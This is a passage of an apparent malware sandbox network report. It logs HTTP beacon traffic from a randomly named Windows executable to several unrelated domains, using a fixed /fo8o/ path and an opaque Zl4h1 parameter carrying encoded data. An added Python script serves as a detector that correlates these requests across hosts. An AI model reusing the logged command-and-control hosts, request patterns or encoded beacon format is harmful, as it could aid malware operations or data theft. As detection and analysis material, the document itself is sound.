                                                    Data Raw: 33 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 4d 6f dc 36 10 bd fb 57 4c 74 d9 5d a0 2b 6a 5d 27 4e b4 5a 1d 1c 3b 48 00 d7 35 e2 0d 90 a0 28 0a 8a 9a 5d d1 91 48 86 a4 d6 5e 27 01 72 29 72 e8 a1 e8 a1 01 82 a4 a7 a2 40 8f 69 4f 05 0a f7 d7 74 dd f6 5f 74 24 6d d1 4d 3f 0e a2 44 72 de e3 cc e3 1b 25 d7 f6 3f be 3d 7d 74 7c 00 77 a7 1f 1d c2 f1 83 bd c3 7b b7 21 18 32 76 ef 60 7a 87 b1 fd e9 7e b7 b3 1d 46 8c 1d 1c 05 e9 56 52 f8 aa 6c 5e c8 f3 34 f1 d2 97 98 fe f1 f2 ab ab 1f 5f af be ff 81 1b f3 eb 4f 5f fc 7e 79 79 eb fa 6e 34 bc 7a fb e2 ea d5 bb d5 db 77 ab 6f 5e 3c fb ed f5 cf ab cb af 57 9f 7f b7 fa f2 db 84 75 b8 ad c4 09 2b 8d 07 67 c5 24 60 a7 4f 6a b4 cb b0 92 2a 3c 75 01 a4 09 eb b6 e9 a3 3d 6d 2b c9 74 be 84 6c 2e 74 a9 ed 24 38 2b a4 c7 36 a5 51 ba 13 7d 08 77 b4 cd 64 9e a3 a2 f8 11 2d 9b f4 91 ae 21 d7 aa e7 a1 e0 0b 04 83 b6 92 ce 49 ad c0 6b e0 42 a0 73 e0 0b 84 07 f7 0f a1 59 2c a4 03 87 76 81 36 84 13 6d ed 12 66 da b6 11 52 09 ad 16 a8 24 2a 81 61 92 59 96 6e 1d 97 c8 1d 82 [TRUNCATED]
                                                    Data Ascii: 31buTMo6WLt]+j]'NZ;H5(]H^'r)r@iOt_t$mM?Dr%?=}t|w{!2v`z~FVRl^4_O_~yyn4zwo^<Wu+g$`Oj*<u=m+tl.t$8+6Q}wd-!IkBsY,v6mfR$*aYnE19Wy)[L>jNDYqNvkicXRtZf3IFLl=g]:d#XU0;h{8ZyTyJKs\aBt#nc8,q<'9QdrbWi8#{EkQP*<<e%03|c*n6HF%kJ4<]pLAHQc&5CHnqoIXp2^q<LHClREM6*R*]A??m/33.6%x+;hp89RQ{=~f>7Ano_0


                                                     Session ID: 43 | Source IP: 192.168.2.11 | Source Port: 49755 | Destination IP: 104.206.198.212 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Jun 9, 2024 18:02:54.660970926 CEST | 1812 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.shenzhoucui.com
                                                    Origin: http://www.shenzhoucui.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.shenzhoucui.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 67 48 69 34 62 39 4c 35 67 38 69 4d 58 69 59 69 62 44 58 33 48 35 61 4a 33 36 74 4b 48 71 70 38 6b 6d 34 54 7a 61 5a 79 34 4f 61 57 63 65 4f 30 6d 69 69 56 51 52 36 78 74 52 58 59 73 35 39 39 6b 50 46 4b 63 54 46 45 48 45 45 4f 59 48 31 66 43 51 63 50 6e 39 79 36 64 65 68 2b 44 74 73 4d 41 6f 2f 2b 37 75 56 72 44 36 4b 71 35 47 72 4f 6a 6d 63 2b 39 61 46 6b 68 38 49 37 6f 45 49 52 32 66 61 61 64 32 2f 61 6d 69 6d 59 38 49 73 74 76 48 34 59 36 41 57 75 67 61 6b 7a 75 35 64 72 68 35 66 76 77 66 4a 7a 2b 70 57 37 46 50 66 4c 79 66 4d 64 36 35 62 66 35 46 56 4e 69 51 69 74 6d 51 38 53 42 34 55 49 6c 39 37 31 42 46 62 59 79 46 6d 31 2b 47 64 50 69 79 31 34 63 77 6c 77 32 70 4e 5a 32 35 2f 47 49 4b 33 49 36 68 72 58 50 31 43 4e 71 45 4a 48 64 35 52 64 57 63 37 68 30 4b 75 37 6e 64 41 42 61 50 39 5a 45 55 69 66 4f 6f 43 51 78 54 55 56 6e 2b 78 77 76 41 62 73 78 4f 32 47 2f 6e 34 67 66 57 48 58 37 32 4c 54 31 36 55 56 6f 69 7a 30 58 73 77 34 68 64 67 4e [TRUNCATED]
                                                    Data Ascii: Zl4h1=PInIcMmvPUghgHi4b9L5g8iMXiYibDX3H5aJ36tKHqp8km4TzaZy4OaWceO0miiVQR6xtRXYs599kPFKcTFEHEEOYH1fCQcPn9y6deh+DtsMAo/+7uVrD6Kq5GrOjmc+9aFkh8I7oEIR2faad2/amimY8IstvH4Y6AWugakzu5drh5fvwfJz+pW7FPfLyfMd65bf5FVNiQitmQ8SB4UIl971BFbYyFm1+GdPiy14cwlw2pNZ25/GIK3I6hrXP1CNqEJHd5RdWc7h0Ku7ndABaP9ZEUifOoCQxTUVn+xwvAbsxO2G/n4gfWHX72LT16UVoiz0Xsw4hdgNlXYqzVHDJoWa9Ul+ysVtK/o21NkPZf35pLxF6jKGBYi5tQVJV6QHDJHDr9ccSPE6YbhCMvWNhTlbh0/5ysyZltwRlLwZF7dpXDf/jhKI2wlv15bfEbV77zNuG53yfqxqhdenTb2cgEkL/8x2QqsDRdiQoiYnBk1e3bHbQ30ymviDTBxl83K3yXoIelOkjwm6v3v29lWJp24l/9kLUiXf0HnW9PfVfRKviqsKyiO7BBRFHBgJVZuO28Zk7pHtYByNJgWhCROLRLyiuu8JuXPQi25M3YuAmDWZkvYz/JjzfIiule7MDvxNys5aISraIhTAIsp6cE5eFNbaTqsBARF9BKAXq/3YOGlvBieWFWGWVB8umR3YoRa2kcFdPJQBllckVa8/bcTVClfTSa1YW2r04mZXROZ2E3NUlgidokbF6C3PgFmbLYfZzoWjcDYHeH+cLMipN16bGwfTp8XQ8AEzIabveMMhvyC19aNhe4xIEzjqg9zpsX8mKqgIP+CxXswOHEcGT1MuZLYo1WMoURvEkTPsToOtLUUoL9nNZ35RsNeosZKOUOd0gMhTgPlyjVNLwN/0L83OMjW6ODqHWQ9xCEmAKQ2Drttv2iZmiC/Z6+dlsBJ46Vk6PynpIBuoJxox8qHpU0VmBegkdeEl8YucefcBuSaYV5Sl96 [TRUNCATED]
                                                     Jun 9, 2024 18:02:55.405416012 CEST | 1037 | IN | HTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:02:56 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    X-Powered-By: PHP/5.4.41
                                                    Content-Encoding: gzip
                                                    Data Raw: 33 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 4d 6f dc 36 10 bd fb 57 4c 74 d9 5d a0 2b 6a 5d 27 4e b4 5a 1d 1c 3b 48 00 d7 35 e2 0d 90 a0 28 0a 8a 9a 5d d1 91 48 86 a4 d6 5e 27 01 72 29 72 e8 a1 e8 a1 01 82 a4 a7 a2 40 8f 69 4f 05 0a f7 d7 74 dd f6 5f 74 24 6d d1 4d 3f 0e a2 44 72 de e3 cc e3 1b 25 d7 f6 3f be 3d 7d 74 7c 00 77 a7 1f 1d c2 f1 83 bd c3 7b b7 21 18 32 76 ef 60 7a 87 b1 fd e9 7e b7 b3 1d 46 8c 1d 1c 05 e9 56 52 f8 aa 6c 5e c8 f3 34 f1 d2 97 98 fe f1 f2 ab ab 1f 5f af be ff 81 1b f3 eb 4f 5f fc 7e 79 79 eb fa 6e 34 bc 7a fb e2 ea d5 bb d5 db 77 ab 6f 5e 3c fb ed f5 cf ab cb af 57 9f 7f b7 fa f2 db 84 75 b8 ad c4 09 2b 8d 07 67 c5 24 60 a7 4f 6a b4 cb b0 92 2a 3c 75 01 a4 09 eb b6 e9 a3 3d 6d 2b c9 74 be 84 6c 2e 74 a9 ed 24 38 2b a4 c7 36 a5 51 ba 13 7d 08 77 b4 cd 64 9e a3 a2 f8 11 2d 9b f4 91 ae 21 d7 aa e7 a1 e0 0b 04 83 b6 92 ce 49 ad c0 6b e0 42 a0 73 e0 0b 84 07 f7 0f a1 59 2c a4 03 87 76 81 36 84 13 6d ed 12 66 da b6 11 52 09 ad 16 a8 24 2a 81 61 92 59 96 6e 1d 97 c8 1d 82 [TRUNCATED]
                                                    Data Ascii: 31buTMo6WLt]+j]'NZ;H5(]H^'r)r@iOt_t$mM?Dr%?=}t|w{!2v`z~FVRl^4_O_~yyn4zwo^<Wu+g$`Oj*<u=m+tl.t$8+6Q}wd-!IkBsY,v6mfR$*aYnE19Wy)[L>jNDYqNvkicXRtZf3IFLl=g]:d#XU0;h{8ZyTyJKs\aBt#nc8,q<'9QdrbWi8#{EkQP*<<e%03|c*n6HF%kJ4<]pLAHQc&5CHnqoIXp2^q<LHClREM6*R*]A??m/33.6%x+;hp89RQ{=~f>7Ano_0


                                                     Session ID: 44 | Source IP: 192.168.2.11 | Source Port: 49756 | Destination IP: 104.206.198.212 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Jun 9, 2024 18:02:57.277683973 CEST | 507 | OUT | GET /fo8o/?Zl4h1=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBCxUtCWRaVQIS6dSVAag1St1hJr7Wk88RO5I=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.shenzhoucui.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                     Jun 9, 2024 18:02:58.219666004 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:02:59 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    X-Powered-By: PHP/5.4.41
                                                    Data Raw: 35 39 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e9 87 91 e6 b2 99 e5 a8 b1 61 70 70 e4 b8 8b e8 bd bd 39 35 37 30 2d e6 9c 80 e6 96 b0 e5 9c b0 e5 9d 80 7c e7 99 bb e5 bd 95 e5 85 a5 e5 8f a3 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 27 e9 87 91 e6 b2 99 e5 a8 b1 61 70 70 e4 b8 8b e8 bd bd 39 35 37 30 2d e6 9c 80 e6 96 b0 e5 9c b0 e5 9d 80 7c e7 99 bb e5 bd 95 e5 85 a5 e5 8f a3 27 3e e9 87 91 e6 b2 99 e5 a8 b1 61 70 70 e4 b8 8b e8 bd bd 39 35 37 30 2d e6 9c 80 e6 96 b0 e5 9c b0 e5 9d 80 7c e7 99 bb e5 bd 95 e5 85 a5 e5 8f a3 3c 2f 61 3e 3c 2f 68 31 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 [TRUNCATED]
                                                    Data Ascii: 594<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>app9570-|</title><script src="/jquery.min.js" ></script></head><body><h1><a href="/" title='app9570-|'>app9570-|</a></h1><center><h1>403 Forbidden</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>/fo8o/?Zl4h1=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBCxUtCWRaVQIS6dSVAag1St1hJr7Wk88RO5I=&Pbw=PLVXbnG85</td></tr><tr><td>Server:</td><td>prod-qwmh-bj7-pool202-frontend-static-01</td></tr><tr><td>Date:</td><td>2024/06/10 00:02:58</td></tr></table><hr><center>tengine</center><div style="clear:both;padding:10px;text-align:center;margin:5"><a href="/shenzhoucui.com.xml" target="_blank">XML </a> | <a href="/shenzhoucui.com.htm [TRUNCATED]
                                                     Jun 9, 2024 18:02:58.219706059 CEST | 410 | IN | Data Raw: 3e 53 69 74 65 6d 61 70 20 e5 9c b0 e5 9b be 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72
                                                    Data Ascii: >Sitemap </a></div><script> (function(){var bp = document.createElement('script');var curProtocol = window.location.protocol.split(':')[0];if (curProtocol === 'https') {bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';}else{bp.src =


                                                     Session ID: 45 | Source IP: 192.168.2.11 | Source Port: 49757 | Destination IP: 194.58.112.174 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Jun 9, 2024 18:03:03.320683002 CEST | 764 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.b301.space
                                                    Origin: http://www.b301.space
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.b301.space/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 37 70 55 4e 41 44 38 34 4b 70 64 35 32 47 7a 54 71 76 67 75 33 31 66 65 75 62 46 52 76 45 65 4f 41 68 4a 4b 75 79 37 2b 30 31 4f 33 37 41 38 46 68 74 6e 4d 6d 46 50 4d 2f 50 67 57 47 55 78 53 31 55 38 76 46 65 6d 61 61 78 6b 73 37 6b 63 48 73 4f 78 57 62 70 49 79 4c 6a 35 38 48 72 2b 75 4e 6a 51 67 77 6b 44 6e 63 39 44 44 6e 46 73 59 75 2f 4e 47 4e 2b 50 75 56 33 4c 54 79 6e 71 66 47 38 76 42 63 31 56 5a 6b 5a 48 4c 62 66 45 30 36 48 42 56 47 65 47 75 65 49 70 55 68 69 72 39 66 67 59 6f 47 67 34 43 52 69 78 72 38 5a 46 5a 33 67 67 64 6a 41 3d 3d
                                                    Data Ascii: Zl4h1=NWf3bZRoYEuJ7pUNAD84Kpd52GzTqvgu31feubFRvEeOAhJKuy7+01O37A8FhtnMmFPM/PgWGUxS1U8vFemaaxks7kcHsOxWbpIyLj58Hr+uNjQgwkDnc9DDnFsYu/NGN+PuV3LTynqfG8vBc1VZkZHLbfE06HBVGeGueIpUhir9fgYoGg4CRixr8ZFZ3ggdjA==
                                                     Jun 9, 2024 18:03:04.231846094 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:03:04 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Content-Encoding: gzip
                                                    Data Raw: 65 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 25 3b 29 6c 8b a4 e2 d8 69 bf 38 49 01 39 2d 0a c5 21 2e 97 57 e4 5a cb 5d 76 77 29 99 b1 0d 24 76 9e 88 11 23 69 80 16 41 df 45 d1 4f 05 6c d9 6a 14 3f e4 bf b0 fb 8f 7a 66 ee ee 72 49 91 b2 fc 48 1a 01 92 c8 fb 9c 3b 73 e6 cc dc 47 fd 68 c7 b7 a3 d1 40 89 5e d4 77 9b 75 fa 2b 6c 57 86 61 a3 e4 84 2d d9 91 83 c8 d9 54 25 e1 4a af db 28 05 c3 12 da 28 d9 69 d6 fb 2a 92 c2 ee c9 20 54 51 a3 f4 ce c5 5f 18 a7 50 c7 a5 9e ec ab 46 69 20 83 0d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 68 04 18 73 b2 e5 a6 a3 b6 06 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 84 21 22 27 72 55 73 6b 6b cb 6c 9f 5c 5c 32 c3 81 b4 55 dd d2 a5 75 d7 f1 36 44 a0 dc 46 29 8c 46 ae 0a 7b 4a 61 82 be ea 38 b2 51 92 ae 5b 12 bd 40 ad e7 62 b2 58 86 1c 46 be 69 87 21 06 1f f7 77 b0 80 ac f5 ba 84 44 be 67 e2 cf ca 52 49 90 e6 a0 a8 be ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 41 d4 b4 8e d5 8f ae 9d 3b 7f f6 [TRUNCATED]
                                                    Data Ascii: e30Zko_q"isw%;)li8I9-!.WZ]vw)$v#iAEOlj?zfrIH;sGh@^wu+lWa-T%J((i* TQ_PFi {(P`hs~n9MV995B[!"'rUskkl\\2Uu6DF)F{Ja8Q[@bXFi!wDgRI*A;c-[fH{c\eG4#*X.]jV:H:=TV_z#rX^CM,ORq #0Zg>\4ZNEHmQ1"Rr#v\KqqV%zgsnW#)RW0QM?w".|>w/PuAAxv&W;o(Y]rVaF%uhUVV *x/6b0}a$#fOvZkc"SCic^'}v+A3'l8Q{ai`~])Wy6,UKj3k.m&Nji)kY[=B$g/`[?l&'6.5C}RrL<x%/3G)XVQ?lJn2g2/PH5B(0K07^irS38Zp<D8oNBE5xhG3SXl*N#wxRS,}/nDo [TRUNCATED]
                                                     Jun 9, 2024 18:03:04.231864929 CEST | 1236 | IN | Data Raw: 68 fb 74 d6 b1 f9 0b 74 ea 1a 7d f8 b0 e3 b5 5c b5 1e 19 da 9f 31 61 14 f8 5e f7 e9 46 01 f7 02 ee 36 85 ae 7f 01 bd 88 53 50 ef e3 f8 1e 70 c6 23 4c 70 eb b4 db 6a e5 84 c3 b6 36 79 2e 49 db 07 cb f5 11 19 3d 85 71 ff 8c 78 77 3f f9 0a 2e f2 38
                                                    Data Ascii: htt}\1a^F6SPp#Lpj6y.I=qxw?.8"^z7BF*[ y*[ u%at7^]9p`G5.0MN[smr'X-_V!? 3&G9_5x`j?sB| .E$3i
                                                     Jun 9, 2024 18:03:04.231878042 CEST | 1236 | IN | Data Raw: 4a 64 b8 ff 24 b2 64 8e 03 55 e9 d8 2b f2 d4 33 85 16 27 da f3 81 98 ed b9 39 65 05 d9 51 28 a7 e0 5f 4c 5a 91 24 73 2a c0 59 70 e1 28 02 cd 91 02 83 c3 1f 81 37 3f e3 10 8f 3d 2c 83 1c f2 1c 15 f1 b7 dc 0d 60 d6 f9 05 28 bb 86 7d 71 be 71 a6 a4
                                                    Data Ascii: Jd$dU+3'9eQ(_LZ$s*Yp(7?=,`(}qq!6oc=r?;}d"~R8:zYptj,?t'Vx&+Co>pJCTp{=.=J*\Aofe.KJwd$+z(8"{F\4j*&Q@[|
                                                     Jun 9, 2024 18:03:04.231888056 CEST | 110 | IN | Data Raw: 16 b2 55 a1 16 c7 09 9b 4e e8 07 5c c4 e3 5e 2f 1a d9 f3 b3 e0 c5 b9 b3 d3 ef ea 17 68 33 57 b2 45 21 cc ca e4 c5 5b 35 3a ae c6 e3 3d 1f 8e 85 77 39 67 64 3b f4 dd 61 a4 96 05 5d 7a 9c 31 4e e3 67 70 65 b9 24 a4 8b e7 4c e4 08 3a 41 1f 4f 4a 18
                                                    Data Ascii: UN\^/h3WE![5:=w9gd;a]z1Ngpe$L:AOJE]D.')0
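The sessions above show one observable repeated on three unrelated hosts (www.empowermedeco.com, www.shenzhoucui.com, www.b301.space) from the same PID: a fixed URI path (/fo8o/), a fixed parameter name (Zl4h1 on every request, plus Pbw=PLVXbnG85 on the GETs), the same Windows 7 / IE8 User-Agent string byte for byte, and on the POSTs an Origin and Referer built from the request's own Host and path, the way a browser form submission from that page would look. The servers' replies (301, 200 carrying a 403 page, 404) do not matter to the pattern; the path and parameter name reused across hosts do. The Python below is an added example and is not part of the Joe Sandbox report: it parses raw HTTP request text, tags the per-request indicators just listed, and correlates requests by path across Host values. The sample requests are reconstructed from sessions 40, 41 and 45 with their opaque values truncated, the www.example.com request is constructed as a control, and the function names and the minimum-host threshold are this example's own choices.

```python
"""Correlate HTTP requests that reuse one URI path and parameter name across
unrelated Host values, as in the sessions above.  Added example, not part of
the Joe Sandbox report; sample requests are reconstructed from the report with
their opaque values truncated, and the thresholds are this example's choice."""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Exact User-Agent sent in every request above (a Windows 7 / IE8 string).
LEGACY_IE8_UA = (
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; "
    ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
    "Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)"
)


def _build(method, host, target, body=None, extra=(), ua=LEGACY_IE8_UA):
    """Assemble raw HTTP/1.1 request text (used only to construct samples)."""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}",
             "Connection: close", f"User-Agent: {ua}", *extra]
    if body is not None:
        lines += ["Content-Type: application/x-www-form-urlencoded",
                  f"Content-Length: {len(body)}"]
    return "\r\n".join(lines) + "\r\n\r\n" + (body or "")


# Constructed samples: sessions 40, 41 and 45 above with values truncated,
# plus one unrelated request that must not be flagged.
SAMPLE_REQUESTS = [
    _build("GET", "www.empowermedeco.com",
           "/fo8o/?Zl4h1=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGel&Pbw=PLVXbnG85"),
    _build("POST", "www.shenzhoucui.com", "/fo8o/",
           body="Zl4h1=PInIcMmvPUghhiq4ean5r8iPOiYiVjWfH5eJ34AXEYF8kwoTy/Fy6OaW",
           extra=("Origin: http://www.shenzhoucui.com",
                  "Referer: http://www.shenzhoucui.com/fo8o/")),
    _build("POST", "www.b301.space", "/fo8o/",
           body="Zl4h1=NWf3bZRoYEuJ7pUNAD84Kpd52GzTqvgu31feubFRvEeOAhJKuy7+01O3",
           extra=("Origin: http://www.b301.space",
                  "Referer: http://www.b301.space/fo8o/")),
    _build("GET", "www.example.com", "/index.html",
           ua="Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"),
]


def parse_request(raw):
    """Split raw request text into method, path, parameter names and headers."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    # Keep parameter *names* only: the values are opaque and differ per request.
    query = body if method == "POST" else url.query
    return {"method": method, "path": url.path,
            "params": sorted(parse_qs(query, keep_blank_values=True)),
            "headers": headers}


def request_indicators(req):
    """Per-request tags; each is weak on its own and meant to be combined."""
    h, tags = req["headers"], []
    host = h.get("host", "")
    if h.get("user-agent") == LEGACY_IE8_UA:
        tags.append("legacy-ie8-ua")
    if req["method"] == "POST":
        if h.get("content-type") == "application/x-www-form-urlencoded":
            tags.append("form-post")
        # Origin and Referer derived from the request's own Host and path,
        # as a real browser form submission from that page would look.
        if (h.get("origin") == f"http://{host}"
                and h.get("referer") == f"http://{host}{req['path']}"):
            tags.append("self-referer")
    return tags


def correlate(parsed, min_hosts=2):
    """Group by URI path; report paths contacted on min_hosts+ distinct hosts."""
    by_path = defaultdict(lambda: {"hosts": set(), "params": set(), "methods": set()})
    for r in parsed:
        g = by_path[r["path"]]
        g["hosts"].add(r["headers"].get("host", ""))
        g["params"].update(r["params"])
        g["methods"].add(r["method"])
    return {path: {k: sorted(v) for k, v in g.items()}
            for path, g in by_path.items() if len(g["hosts"]) >= min_hosts}


def analyse(raw_requests, min_hosts=2):
    """Full pass: per-request tags plus the cross-host correlation."""
    parsed = [parse_request(r) for r in raw_requests]
    return {"per_request": [(r["headers"].get("host", ""), request_indicators(r))
                            for r in parsed],
            "correlated": correlate(parsed, min_hosts)}


if __name__ == "__main__":
    for path, group in analyse(SAMPLE_REQUESTS)["correlated"].items():
        print(f"{path}: {group['methods']} on {len(group['hosts'])} hosts "
              f"{group['hosts']} with params {group['params']}")
```

Run against proxy or sandbox HTTP logs, the grouping key (path plus parameter names, scoped to one source host or process) is what produces the hit; the IE8 string on its own is only a supporting tag, since genuine legacy clients still send it, and the "self-referer" tag likewise appears in ordinary form posts. What no ordinary client does is submit the same form path and field name to three unrelated domains within seconds.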


                                                     Session ID: 46 | Source IP: 192.168.2.11 | Source Port: 49758 | Destination IP: 194.58.112.174 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Jun 9, 2024 18:03:05.966167927 CEST | 784 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.b301.space
                                                    Origin: http://www.b301.space
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.b301.space/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 4e 57 66 33 62 5a 52 6f 59 45 75 4a 36 4e 6f 4e 4d 41 6b 34 62 35 64 34 71 32 7a 54 67 50 67 71 33 31 62 65 75 65 6f 4d 73 79 4f 4f 4f 6b 74 4b 74 33 48 2b 31 31 4f 33 6a 77 38 4d 73 4e 6e 35 6d 46 44 75 2f 4b 59 57 47 53 64 53 31 57 30 76 46 70 79 56 62 68 6b 71 69 30 63 46 69 75 78 57 62 70 49 79 4c 6a 74 57 48 71 57 75 4d 58 55 67 77 47 72 6b 56 64 44 43 7a 56 73 59 71 2f 4e 43 4e 2b 50 59 56 31 2b 45 79 6c 53 66 47 39 66 42 63 67 30 50 74 5a 48 4a 52 2f 45 6c 35 45 70 52 42 76 53 6b 57 71 4a 46 33 44 57 66 54 47 4a 79 57 44 78 56 53 78 35 70 6f 2f 6b 70 2b 52 46 55 34 48 51 73 55 43 55 62 30 44 48 52 54 4d 71 7a 7a 6b 46 32 33 2b 6b 3d
                                                    Data Ascii: Zl4h1=NWf3bZRoYEuJ6NoNMAk4b5d4q2zTgPgq31beueoMsyOOOktKt3H+11O3jw8MsNn5mFDu/KYWGSdS1W0vFpyVbhkqi0cFiuxWbpIyLjtWHqWuMXUgwGrkVdDCzVsYq/NCN+PYV1+EylSfG9fBcg0PtZHJR/El5EpRBvSkWqJF3DWfTGJyWDxVSx5po/kp+RFU4HQsUCUb0DHRTMqzzkF23+k=
                                                    Jun 9, 2024 18:03:06.869708061 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:03:06 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Content-Encoding: gzip
